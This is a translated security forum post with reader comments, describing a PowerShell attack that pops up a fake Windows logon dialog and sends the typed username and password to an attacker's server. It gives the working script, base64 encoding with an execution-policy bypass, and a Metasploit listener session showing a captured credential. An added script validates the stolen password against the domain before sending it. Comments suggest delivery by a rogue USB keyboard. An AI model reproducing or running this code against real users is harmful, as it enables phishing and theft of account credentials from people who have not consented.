Powershell Popups + Capture
五道口杀气 | 2015-01-13 18:17
English original: Powershell Popups + Capture
The advantage of this method is that it writes nothing to disk and captures the credentials of whichever user runs it, regardless of that user's privilege level.
It needs no administrator rights and no UAC bypass.
The idea: a PowerShell script pops up a fake logon prompt; once the user (an administrator, say) types their password, the script sends it to our server.
Here the password is received with Metasploit.
PowerShell script (the original is a single line of semicolon-separated statements; it is split here one statement per line, which works the same when encoded):

# Windows credential dialog, pre-filled with DOMAIN\user so it looks like a re-authentication prompt
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName)
# Accept the listener's self-signed certificate
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$wc = new-object net.webclient
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)")
# Go out through the system proxy, authenticating to it as the current user if needed
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
# The captured username/password are handed to WebClient; it sends them as HTTP Basic auth after the server answers 401
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '')
$result = $wc.downloadstring('https://172.16.102.163')

172.16.102.163 is our listener address. Note that PromptForCredential does not verify the password: whatever the user types, including a mistyped password, is sent as-is.
Encode the script as base64 (-EncodedCommand expects the UTF-16LE form of the script; -w 0 keeps GNU base64 from wrapping the output at 76 columns, which would otherwise break the single argument):
cat power.txt | iconv --to-code UTF-16LE | base64 -w 0
Then run it (-ep bypass is -ExecutionPolicy Bypass, -enc is -EncodedCommand):
powershell -ep bypass -enc <base64-encoded script>
Receiving the password with Metasploit. SSL true, SRVPORT 443 and URIPATH / match the https://172.16.102.163 URL in the script; the module answers the first request with 401 and a Basic challenge, and WebClient retries with the captured credentials:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
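The one-liner above accepts any password the user types. The following is an added example, not code from the original post or from room362: the same prompt and the same Basic-auth exfiltration, but the typed password is checked against the domain (or the local SAM on a non-domain machine) with PrincipalContext.ValidateCredentials first, and the dialog is shown again, up to three times, as a real logon prompt would be. It assumes the http_basic listener from the post at https://172.16.102.163/ with its self-signed certificate, and that the System.DirectoryServices.AccountManagement assembly (.NET 3.5 or later) can be loaded; it must run interactively on Windows.

```powershell
# Added example; not the code from the original post. Same prompt and exfiltration
# as the one-liner, but the typed password is validated before it is sent.
# Assumptions: the http_basic listener from the post is at https://172.16.102.163/
# (self-signed certificate), and System.DirectoryServices.AccountManagement is
# loadable (.NET 3.5 or later).
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

$listener = 'https://172.16.102.163/'
$domain   = [Environment]::UserDomainName   # equals MachineName on a non-domain host
$user     = [Environment]::UserName

# Check a password against the domain, or against the local SAM when the
# machine is not domain-joined. Returns $true/$false, or $null when the check
# itself failed (for example no domain controller reachable).
function Test-Password {
    param([string]$Domain, [string]$User, [string]$Password)
    $type = if ($Domain -ieq [Environment]::MachineName) {
        [System.DirectoryServices.AccountManagement.ContextType]::Machine
    } else {
        [System.DirectoryServices.AccountManagement.ContextType]::Domain
    }
    $ctx = $null
    try {
        $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($type)
        return $ctx.ValidateCredentials($User, $Password)
    } catch {
        return $null
    } finally {
        if ($ctx) { $ctx.Dispose() }
    }
}

# Re-prompt, as a real logon dialog would, until the password validates.
# Stop after three attempts, or when validation is impossible ($null), and send
# whatever was typed last in that case.
$attempts = 0
$valid    = $false
do {
    $cred = $host.UI.PromptForCredential('Failed Authentication', '', "$domain\$user", $domain)
    if ($null -eq $cred) { return }            # user pressed Cancel: nothing to send
    $nc = $cred.GetNetworkCredential()          # splits "DOMAIN\user" into Domain and UserName
    $d  = if ($nc.Domain) { $nc.Domain } else { $domain }
    $attempts++
    $valid = Test-Password -Domain $d -User $nc.UserName -Password $nc.Password
} until ($valid -eq $true -or $null -eq $valid -or $attempts -ge 3)

# Exfiltrate exactly as the original does: the listener answers 401 with a Basic
# challenge and WebClient retries with the credentials set below. The username is
# sent as typed ("DOMAIN\user"), which is what shows up in the msfconsole output.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', 'Wget/1.9+cvs-stable (Red Hat modified)')
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$wc.Credentials = New-Object System.Net.NetworkCredential($cred.UserName, $nc.Password, '')
$null = $wc.DownloadString($listener)
```

Encode and launch it the same way as the original (iconv to UTF-16LE, base64, powershell -ep bypass -enc). ValidateCredentials against a domain generates a real logon attempt at the domain controller, so the validated password is one that works, at the cost of a 4624/4625 logon event per attempt and a possible lockout if the user keeps mistyping; the three-attempt cap is there for that reason.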
Comments:
1#
YY-2012 (#)<alert("living")>(#) | 2015-01-13 18:26
so dope
2#
Kavia (looking for a job, anyone take me in) | 2015-01-13 18:40
mark
3#
Chu (still learning.) | 2015-01-13 18:42
Saw this on Hak5; it's pretty great.
4#
xsser (ten rods, all different lengths!!) | 2015-01-13 18:42
This thing is awesome.
5#
insight-labs (Root Yourself in Success) | 2015-01-13 19:05
Sneaky and dirty...
6#
RainShine (I'm your angel of music.) | 2015-01-13 19:52
so diao...
7# Thanks (1)
Jeremy | 2015-01-13 19:57
"On the importance of Ctrl+Alt+Del"
8#
ACGT | 2015-01-13 20:49
If you can't be bothered to write your own, for XP you can use this:
http://exploit.co.il/hacking/windows-domain-credentials-phishing-tool/
9#
Anymous (I hear collecting 7 wb summons the dragon and gets you a Raspberry Pi; click "thanks" on the right to collect wb and summon the dragon!) | 2015-01-13 21:01
It's PowerShell, so it can be dropped into a HID keyboard attack
http://zone.wooyun.org/content/17931
Find someone to plug it in.
10#
Anymous (I hear collecting 7 wb summons the dragon and gets you a Raspberry Pi; click "thanks" on the right to collect wb and summon the dragon!) | 2015-01-13 21:02
Seems a bit of a gimmick, though.
11#
%230CC (Who's Your Daddy ---lordi) | 2015-01-14 11:28
Explain in more detail how to hook MSF into this...
12#
_Evil (popularizing science is a public service) | 2015-01-14 14:16
Fun stuff.
13#
冷冷的夜 (ready, sing: hope you live worse than me, die sooner than me, eat badly and sleep) | 2015-01-14 16:02
room362 is always solid material, it's just updated too rarely.
14#
Ano_Tom | 2015-01-14 16:17
666
15#
疯狗 (having seen every vulnerability under the sun, the heart is naturally at peace.) | 2015-01-14 16:33
PowerShell is too powerful, this idea is brilliant... cmd is crying in the bathroom.